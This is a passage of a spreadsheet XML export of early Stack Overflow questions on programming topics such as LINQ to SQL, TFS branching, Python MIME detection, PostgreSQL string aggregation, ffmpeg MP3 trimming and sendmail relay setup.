&lt;li&gt;OnStop&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How can I trigger those methods to be called as if unit test is an actual service that calls those methods in proper order?&lt;/p&gt;
&lt;p&gt;At this point, am I even doing a Unit testing? or an Integration test?&lt;/p&gt;
&lt;p&gt;I have looked at WCF service question but it didn't make any sense to me since I have never dealt with WCF service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Managing LINQ to SQL .dbml model complexity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question is addressed to a degree in this question on &lt;a href="http://stackoverflow.com/questions/33664/best-practices-for-managing-linq-to-sql-dbml-files" rel="nofollow"&gt;LINQ to SQL .dbml best practices&lt;/a&gt;, but I am not sure how to add to a question.&lt;/p&gt;
&lt;p&gt;One of our applications uses LINQ to SQL and we have currently have one .dbml file for the entire database which is becoming difficult to manage.  We are looking at refactoring it a bit into separate files that are more module/functionality specific, but one problem is that many of the high level classes would have to be duplicated in several .dbml files as the associations can't be used across .dbml files (as far as I know), with the additional partial class code as well.&lt;/p&gt;
&lt;p&gt;Has anyone grappled with this problem and what recommendations would you make?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom titlebars/chrome in a WinForms app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm almost certain I know the answer to this question, but I'm hoping there's something I've overlooked.&lt;/p&gt;
&lt;p&gt;Certain applications seem to have the Vista Aero look and feel to their caption bars and buttons even when running on Windows XP. (Google Chrome and  Windows Live Photo Gallery come to mind as examples.)  I know that one way to accomplish this from WinForms would be to create a borderless form and draw the caption bar/buttons yourself, then overriding &lt;code&gt;WndProc&lt;/code&gt; to make sure moving, resizing, and button clicks do what they're supposed to do (I'm not clear on the specifics but could probably pull it off given a day to read documentation.)  I'm curious if there's a different, easier way that I'm overlooking.  Perhaps some API calls or window styles I've overlooked?&lt;/p&gt;
&lt;p&gt;I believe Google has answered it for me by using the roll-your-own-window approach with Chrome.  I will leave the question open for another day in case someone has new information, but I believe I have answered the question myself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TFS - Branching for experimental development: Solution fails to load</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;Disclaimer: I'm stuck on TFS and I hate it.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;My source control structure looks like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/dev&lt;/li&gt;
&lt;li&gt;/releases&lt;/li&gt;
&lt;li&gt;/branches&lt;/li&gt;
&lt;li&gt;/experimental-upgrade&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I branched from dev to experimental-upgrade and didn't touch it.  I then did some more work in dev and merged to experimental-upgrade.  Somehow TFS complained that I had changes in both source and target and I had to resolve them.  I chose to "Copy item from source branch" for all 5 items.&lt;/p&gt;
&lt;p&gt;I check out the experimental-upgrade to a local folder and try to open the main solution file in there.  TFS prompts me: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Projects have recently been added to this solution.  Would you like to get them from source control?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If I say yes it does some stuff but ultimately comes back failing to load a handful of the projects.  If I say no I get the same result.&lt;/p&gt;
&lt;p&gt;Comparing my sln in both branches tells me that they are equal.&lt;/p&gt;
&lt;p&gt;Can anyone let me know what I'm doing wrong?  This should be a straightforward branch/merge operation...&lt;/p&gt;
&lt;p&gt;TIA.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I noticed that if I click "yes" on the above dialog, the projects are downloaded to the $/ root of source control... (i.e. out of the dev &amp;amp; branches folders)&lt;/p&gt;
&lt;p&gt;If I open up the solution in the branch and remove the dead projects and try to re-add them (by right-clicking sln, add existing project, choose project located in the branch folder, it gives me the error...&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Cannot load the project c:\sandbox\my_solution\proj1\proj1.csproj, the file has been removed or deleted.  The project path I was trying to add is this:  c:\sandbox\my_solution\branches\experimental-upgrade\proj1\proj1.csproj&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What in the world is pointing these projects &lt;em&gt;outside&lt;/em&gt; of their local root?  The solution file is identical to the one in the dev branch, and those projects load just fine.  I also looked at the vspscc and vssscc files but didn't find anything.&lt;/p&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extract Address Information from a Web Page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to take a web page and extract the address information from the page. Some are easier than others. I'm looking for a firefox plugin, windows app, or VB.NET code that will help me get this done.&lt;/p&gt;
&lt;p&gt;Ideally I would like to have a web page on our admin (ASP.NET/VB.NET) where you enter a URL and it scraps the page and returns a Dataset that I can put in a Grid.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Metalanaguage to describe the Model from MVC to generate identical client and server side code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a powerful meta-language to describa behaviour for an application i intend to use in offline mode (google-gears + javascript) and server side sqlite + (php/ruby/java etc) and looking for a good format to describe the model's behaviour which can be easily converted to the target languages.
Am I completely off track, and there is a much better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Views, blessing or curse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I once worked with an architect who banned the use of SQL views. His main reason was that views made it too easy for a thoughtless coder to needlessly involve joined tables which, if that coder tried harder, could be avoided altogether.  Implicitly he was encouraging code reuse via copy-and-paste instead of encapsulation in views.&lt;/p&gt;
&lt;p&gt;The database had nearly 600 tables and was highly normalised, so most of the useful SQL was necessarily verbose.&lt;/p&gt;
&lt;p&gt;Several years later I can see at least one bad outcome from the ban - we have many hundreds of dense, lengthy stored procs that verge on unmaintainable.&lt;/p&gt;
&lt;p&gt;In hindsight I would say it was a bad decision, but what are your experiences with SQL views?  Have you found them bad for performance? Any other thoughts on when they are or are not appropriate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Dynamic .NET language makes more sense to learn, Iron Ruby or Iron Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to take some time to learn more about dynamic languages built on top of the DLR and I'm not sure which language would be better to learn.&lt;/p&gt;
&lt;p&gt;Having limited time, I really only have time to look learn one of them.&lt;/p&gt;
&lt;p&gt;Any opinions on which of the two (Iron Ruby or Iron Python) would be more useful in the long run?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Efficient synthesis of a 4-to-1 function in Verilog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to implement a 4-to-1 function in Veriog.  The input is 4 bits, a number from 0-15.  The output is a single bit, 0 or 1.  Each input gives a different output and the mapping from inputs to outputs is known, but the inputs and outputs themselves are not.  I want vcs to successfully optimizing the code and also have it be as short/neat as possible.  My solution so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wire [3:0] a;
wire b;
wire [15:0] c;
assign c = 16'b0100110010111010; //for example but could be any constant
assign b = c[a];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Having to declare c is ugly and I don't know if vcs will recognize the K-map there.  Will this work as well as a case statement or an assignment in conjunctive normal form?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is WCF in simple terms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is WCF in simple terms?&lt;/p&gt;
&lt;p&gt;It's hard to distill the meaning from &lt;a href="http://en.wikipedia.org/wiki/Windows_Communication_Foundation"&gt;the Wikipedia page&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing/Using C++ Libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for basic examples/tutorials on:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;How to write/compile libraries in C++ (&lt;code&gt;.so&lt;/code&gt; files for Linux, &lt;code&gt;.dll&lt;/code&gt; files for Windows).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;How to import and use those libraries in other code.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Setting Focus with ASP.NET AJAX Control Toolkit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the &lt;a href="http://www.asp.net/AJAX/AjaxControlToolkit/Samples/AutoComplete/AutoComplete.aspx" rel="nofollow"&gt;AutoComplete&lt;/a&gt; control from the ASP.NET AJAX Control Toolkit and I'm experiencing an issue where the AutoComplete does not populate when I set the focus to the assigned textbox.  &lt;/p&gt;
&lt;p&gt;I've tried setting the focus in the Page_Load, Page_PreRender, and Page_Init events and the focus is set properly but the AutoComplete does not work.  If I don't set the focus, everything works fine but I'd like to set it so the users don't have that extra click.  &lt;/p&gt;
&lt;p&gt;Is there a special place I need to set the focus or something else I need to do to make this work?  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get Last Day of the Month in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way using Python's standard library to easily determine (i.e. one function call) the last day of a given month?&lt;/p&gt;
&lt;p&gt;If the standard library doesn't support that, does the dateutil package support this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use p4merge as the merge/diff tool for Mercurial?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to setup &lt;a href="http://www.selenic.com/mercurial/wiki/index.cgi/Mercurial"&gt;Mercurial&lt;/a&gt; to use &lt;a href="http://www.perforce.com/perforce/products/merge.html"&gt;p4merge&lt;/a&gt; as the merge/diff tool on OS X 10.5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex to match against something that is not a specific substring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a regex that will match a string that starts with one substring and does not end with a certain substring.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Updated to be correct, thanks @Apocalisp
^foo.*(?&amp;lt;!bar)$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Should match anything that starts with "foo" and doesn't end with "bar".  I know about the [^...] syntax, but I can't find anything that will do that for a string instead of single characters.  &lt;/p&gt;
&lt;p&gt;I am specifically trying to do this for Java's regex, but I've run into this before so answers for other regex engines would be great too.  &lt;/p&gt;
&lt;p&gt;Thanks to @Kibbee for verifying that this works in C# as well.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some resources for getting started in operating system development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One thing I've always wanted to do is develop my very own operating system (not necessarily fancy like Linux or Windows, but better than a simple boot loader which I've already done).&lt;/p&gt;
&lt;p&gt;I'm having a hard time finding resources/guides that take you past writing a simple "Hello World" OS.  &lt;/p&gt;
&lt;p&gt;I know lots of people will probably recommend I look at Linux or BSD; but the code base for systems like that is (presumably) so big that I wouldn't know where to start.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;Update: To make it easier for people who land on this post through Google here are some OS development resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://web.archive.org/web/20120506110242/http://osix.net/modules/article/?id=359"&gt;Writing Your Own Operating System&lt;/a&gt; (Thanks Adam)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://www.linuxfromscratch.org/"&gt;Linux From Scratch&lt;/a&gt; (Thanks John)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/SharpOS_(operating_system)"&gt;SharpOS (C# Operating System)&lt;/a&gt; (Thanks lomaxx)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://www.minix3.org/"&gt;Minix3&lt;/a&gt; and &lt;a href="http://minix1.woodhull.com/mxdownld.html"&gt;Minix2&lt;/a&gt; (Thanks Mike)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://wiki.osdev.org/Main_Page"&gt;OS Dev Wiki&lt;/a&gt; and &lt;a href="http://forum.osdev.org/"&gt;Forums&lt;/a&gt; (Thanks Steve)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://www.osdever.net/"&gt;BonaFide&lt;/a&gt; (Thanks Steve)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://osdever.net/bkerndev/Docs/intro.htm"&gt;Bran&lt;/a&gt; (Thanks Steve)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://www.jamesmolloy.co.uk/tutorial_html/index.html"&gt;Roll your own toy UNIX-clone OS&lt;/a&gt; (Thanks Steve)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://www.brokenthorn.com/Resources/OSDevIndex.html"&gt;Broken Thorn OS Development Series&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Other resources:&lt;/p&gt;
&lt;p&gt;I found a nice resource named &lt;a href="http://mikeos.berlios.de/"&gt;MikeOS&lt;/a&gt;, "MikeOS is a learning tool to demonstrate how simple OSes work. It uses 16-bit real mode for BIOS access, so that it doesn't need complex drivers"&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 11/14/08&lt;/em&gt; &lt;/p&gt;
&lt;p&gt;I found some resources at &lt;a href="http://www.freebyte.com/operatingsystems/#osprojects"&gt;Freebyte's Guide to...Free and non-free Operating Systems&lt;/a&gt; that links to kits such as OSKit and ExOS library.  These seem super useful in getting started in OS development.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 2/23/09&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/users/42019/ric-tokyo"&gt;Ric Tokyo&lt;/a&gt; recommended &lt;a href="http://code.google.com/p/nanoos/"&gt;nanoos&lt;/a&gt; in this &lt;a href="http://stackoverflow.com/questions/580308/making-an-os-in-c/580362#580362"&gt;question&lt;/a&gt;.  Nanoos is an OS written in C++.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 3/9/09&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Dinah provided some useful Stack Overflow discussion of aspiring OS developers: &lt;a href="http://stackoverflow.com/questions/340674/roadblocks-in-creating-a-custom-operating-system"&gt;Roadblocks in creating a custom operating system&lt;/a&gt; discusses what pitfalls you might encounter while developing an OS
and &lt;a href="http://stackoverflow.com/questions/130065/os-development"&gt;OS Development&lt;/a&gt; is a more general discussion.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 7/9/09&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;LB provided a link to the &lt;a href="http://www.scs.stanford.edu/07au-cs140/pintos/pintos.html"&gt;Pintos Project&lt;/a&gt;, an education OS designed for students learning OS development.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 7/27/09 (Still going strong!)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I stumbled upon an &lt;a href="http://academicearth.org/courses/operating-systems-and-system-programming"&gt;online OS course&lt;/a&gt; from Berkley featuring 23 lectures.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://tomos.sourceforge.net/"&gt;TomOS&lt;/a&gt; is a fork of &lt;a href="http://mikeos.berlios.de/"&gt;MikeOS&lt;/a&gt; that includes a little memory manager and mouse support. As MikeOS, it is designed to be an educational project.  It is written in NASM assembler.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 8/4/09&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I found the &lt;a href="http://www.cs.berkeley.edu/~kubitron/courses/cs162-F08/"&gt;slides and other materials&lt;/a&gt; to go along with the online Berkeley lectures listed above. &lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 8/23/09&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;All &lt;a href="http://stackoverflow.com/questions/tagged/osdev"&gt;questions tagged osdev&lt;/a&gt; on stackoverflow&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.eecs.harvard.edu/syrah/os161/"&gt;OS/161&lt;/a&gt; is an academic OS written in c that runs on a simulated hardware.  This OS is similar in Nachos.  Thanks Novelocrat!&lt;/p&gt;
&lt;p&gt;tangurena recommends &lt;a href="http://en.wikipedia.org/wiki/MicroC/OS-II"&gt;http://en.wikipedia.org/wiki/MicroC/OS-II&lt;/a&gt;, an OS designed for embedded systems.  There is a &lt;a href="http://rads.stackoverflow.com/amzn/click/1578201039"&gt;companion book&lt;/a&gt; as well.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0672327201"&gt;Linux Kernel Development&lt;/a&gt; by Robert Love is suggested by Anders.  It is a "widely acclaimed insider's look at the Linux kernel."&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 9/18/2009&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Thanks Tim S. Van Haren for telling us about &lt;a href="http://www.gocosmos.org/index.en.aspx"&gt;Cosmos&lt;/a&gt;, an OS written entirely in c#.&lt;/p&gt;
&lt;p&gt;tgiphil tells us about &lt;a href="http://www.codeplex.com/mosa"&gt;Managed Operating System Alliance (MOSA) Framework&lt;/a&gt;, "a set of tools, specifications and source code to foster development of managed operating systems based on the Common Intermediate Language."&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update 9/24/2009&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Steve found a couple resources for development on windows using Visual Studio, check out &lt;a href="http://www.brokenthorn.com/Resources/OSDevMSVC.html"&gt;BrokenThorn's guide setup with VS 2005&lt;/a&gt; or &lt;a href="http://wiki.osdev.org/Visual%5FStudio"&gt;OSDev's VS Section&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update 1/20/2012&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A set of tutorials aims to take you through programming a simple UNIX-clone operating system for the x86 architecture.
&lt;a href="http://www.jamesmolloy.co.uk/tutorial_html/"&gt;JamesM's kernel development tutorials&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 9/5/2012&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;kerneltrap.org is no longer available.  The linux kernel v0.01 is available from &lt;a href="http://www.kernel.org/pub/linux/kernel/Historic/linux-0.01.tar.gz"&gt;kernel.org&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 12/21/2012&lt;/em&gt;
A basic OS development &lt;a href="http://nw08.american.edu/~mblack/teaching.html#OSPROJECT"&gt;tutorial&lt;/a&gt; designed to be a semester's project. It guides you through to build an OS with basic components. Very good start for beginners. Related &lt;a href="http://nw08.american.edu/~mblack/papers/sigcse09.pdf"&gt;paper&lt;/a&gt;.  Thanks Srujan!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 11/15/2013&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.cs.bham.ac.uk/~exr/lectures/opsys/10_11/lectures/os-dev.pdf"&gt;Writing a Simple Operating System From Scratch&lt;/a&gt;.  Thanks James Moore!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 12/8/2013&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/SamyPesse/How-to-Make-a-Computer-Operating-System"&gt;How to make a computer operating system&lt;/a&gt;  Thanks ddtoni!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated 3/18/2014&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/klange/toaruos"&gt;ToAruOS an OS built mostly from scratch, including GUI&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updated Sept 12 2016&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.independent-software.com/writing-your-own-toy-operating-system/"&gt;Writing your own Toy Operating System&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to generate urls in django</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Django's template language, you can use &lt;code&gt;{% url [viewname] [args] %}&lt;/code&gt; to generate a URL to a specific view with parameters. How can you programatically do the same in Python code?&lt;/p&gt;
&lt;p&gt;What I need is to create a list of menu items where each item has name, URL, and an active flag  (whether it's the current page or not). This is because it will be a lot cleaner to do this in Python than the template language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate ISession Flush: Where and when to use it, and why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the things that get me thoroughly confused is the use of &lt;code&gt;session.Flush&lt;/code&gt;,in conjunction with &lt;code&gt;session.Commit&lt;/code&gt;, and &lt;code&gt;session.Close&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Sometimes &lt;code&gt;session.Close&lt;/code&gt; works, e.g., it commits all the changes that I need. I know I need to use commit when I have a transaction, or a unit of work with several creates/updates/deletes, so that I can choose to rollback if an error occurs.&lt;/p&gt;
&lt;p&gt;But sometimes I really get stymied by the logic behind &lt;code&gt;session.Flush&lt;/code&gt;. I have seen examples where you have a &lt;code&gt;session.SaveOrUpdate()&lt;/code&gt; followed by a flush, but when I remove Flush it works fine anyway. Sometimes I run into errors on the Flush statement saying that the session timed out, and removing it made sure that I didn't run into that error.&lt;/p&gt;
&lt;p&gt;Does anyone have a good guideline as to where or when to use a Flush? I've checked out the NHibernate documentation for this, but I still can't find a straightforward answer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a standard HTML layout with multiple CSS styles available?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When it comes to web-design, I am horrible at producing anything remotely good looking. Thankfully there are a lot of free &lt;a href="http://www.mantisatemplates.com/web-templates.php"&gt;sources&lt;/a&gt; for &lt;a href="http://www.freecsstemplates.org/"&gt;design&lt;/a&gt; &lt;a href="http://www.oswd.org/"&gt;templates&lt;/a&gt;. However, a problem with these designs is that they just cover a single page, and not many use cases. If you take a look at &lt;a href="http://www.csszengarden.com/"&gt;CSS Zen Gardens&lt;/a&gt;, they have 1 single HTML file, and can radically style it differently by just changing the CSS file.&lt;/p&gt;
&lt;p&gt;Now I am wondering if there is a standard HTML layout (tags and ids), that covers alot of use cases, and can be generically themed with different CSS files like Zen Garden. What I am imagining is a set of rules off how you write your html, and what boxes, lists, menus and styles you are supposed to use. A set of standard test pages covering the various uses can be created, and a new CSS file while have to support all the different pages in a nice view.&lt;/p&gt;
&lt;p&gt;Is there any projects that covers anything similar to what I am describing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When is Control.DestroyHandle called?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When is this called? More specifically, I have a control I'm creating - how can I release handles when the window is closed. In normal win32 I'd do it during &lt;code&gt;wm_close&lt;/code&gt; - is &lt;code&gt;DestroyHandle&lt;/code&gt; the .net equivalent?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I don't want to destroy the window handle myself - my control is listening for events on another object and when my control is destroyed, I want to stop listening to those events. Eg:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Dispose(bool disposing) {
    otherObject.Event -= myEventHandler;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there a built-in method to compare collections in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to compare the contents of a couple of collections in my Equals method.  I have a Dictionary and an IList.  Is there a built-in method to do this?&lt;/p&gt;
&lt;p&gt;Edited:
I want to compare two Dictionaries and two ILists, so I think what equality means is clear - if the two dictionaries contain the same keys mapped to the same values, then they're equal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find the mime type of a file in python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say you want to save a bunch of files somewhere, for instance in BLOBs. Let's say you want to dish these files out via a web page and have the client automatically open the correct application/viewer.&lt;/p&gt;
&lt;p&gt;Assumption: The browser figures out which application/viewer to use by the mime-type (content-type?) header in the HTTP response.&lt;/p&gt;
&lt;p&gt;Based on that assumption, in addition to the bytes of the file, you also want to save the MIME type.&lt;/p&gt;
&lt;p&gt;How would you find the MIME type of a file? I'm currently on a Mac, but this should also work on Windows. &lt;/p&gt;
&lt;p&gt;Does the browser add this information when posting the file to the web page?&lt;/p&gt;
&lt;p&gt;Is there a neat python library for finding this information? A WebService or (even better) a downloadable database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to concatenate strings of a string field in a PostgreSQL 'group by' query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to concatenate the strings of a field within a group by query. So for example, I have a table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID   COMPANY_ID   EMPLOYEE
1    1            Anna
2    1            Bill
3    2            Carol
4    2            Dave
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I wanted to group by company_id to get something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;COMPANY_ID   EMPLOYEE
1            Anna, Bill
2            Carol, Dave
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is a built-in function in mySQL to do this &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat"&gt;group_concat&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crop MP3 to first 30 seconds</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Original Question&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I want to be able to generate a new (fully valid) MP3 file from an existing MP3 file to be used as a preview -- try-before-you-buy style. The new file should only contain the first &lt;em&gt;n&lt;/em&gt; seconds of the track.&lt;/p&gt;
&lt;p&gt;Now, I know I could just "chop the stream" at &lt;em&gt;n&lt;/em&gt; seconds (calculating from the bitrate and header size) when delivering the file, but this is a bit dirty and a real PITA on a VBR track. I'd like to be able to generate a proper MP3 file.&lt;/p&gt;
&lt;p&gt;Anyone any ideas?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Answers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Both mp3split and ffmpeg are both good solutions. I chose ffmpeg as it is commonly installed on linux servers and is also &lt;a href="http://sourceforge.net/project/showfiles.php?group_id=205275&amp;amp;package_id=248632"&gt;easily available for windows&lt;/a&gt;.  Here's some more good command line parameters for generating previews with ffmpeg&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-t &amp;lt;seconds&amp;gt;&lt;/code&gt;&lt;/strong&gt; chop after specified number of seconds&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-y&lt;/code&gt;&lt;/strong&gt; force file overwrite&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-ab &amp;lt;bitrate&amp;gt;&lt;/code&gt;&lt;/strong&gt; set bitrate e.g. &lt;em&gt;-ab 96k&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-ar &amp;lt;rate Hz&amp;gt;&lt;/code&gt;&lt;/strong&gt; set sampling rate e.g. &lt;em&gt;-ar 22050&lt;/em&gt; for 22.05kHz&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-map_meta_data &amp;lt;outfile&amp;gt;:&amp;lt;infile&amp;gt;&lt;/code&gt;&lt;/strong&gt; copy track metadata from infile to outfile&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;instead of setting -ab and -ar, you can copy the original track settings, as Tim Farley suggests, with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;-acodec copy&lt;/code&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What software to use for a multistage development environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For me a multistage environment contains environments for development, testing, quality assurance, maybe a client review stage and finally production. It should allow easy collaboration between developers, project status tracking and easy deployment of the application to any stage for a specific version. &lt;/p&gt;
&lt;p&gt;You can propose specific tools for specific application types but I think the question is general enough. Is there any software package ready to use out of the box?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom Aggregate Functions in MS SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create a custom aggregate function in MS SQL Server? An example would help a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>COTS Workshop Registration System</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have any experience with any COTS systems for managing workshops and the associated registrations, courses, communications, etc.?&lt;/p&gt;
&lt;p&gt;We have a home-built Perl system that is about 8 years old and is currently embedded as an iframe in a SharePoint portal site (externally facing). Needless to say, it isn't integrated into our site well, looks like crap, needs an overhaul, lacks features, etc. It would be nice to find either a product we can install or a service that provides those features.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuring sendmail behind a firewall</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up a server which is on a network behind a firewall and I want programs on this computer to be able to use sendmail to send emails to any email address.  We have an SMTP server running on this network (let's call it mailrelay.example.com) which is how we're supposed to get outgoing emails through the firewall.&lt;/p&gt;
&lt;p&gt;So how do I configure sendmail to send all mail through mailrelay.example.com?  Googling hasn't given me the answer yet, and has only revealed that sendmail configuration is extremely complex and annoying.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Microsoft ASP.NET Ajax Cause DOM Object Leaks?</t>
  </si>
  <si>
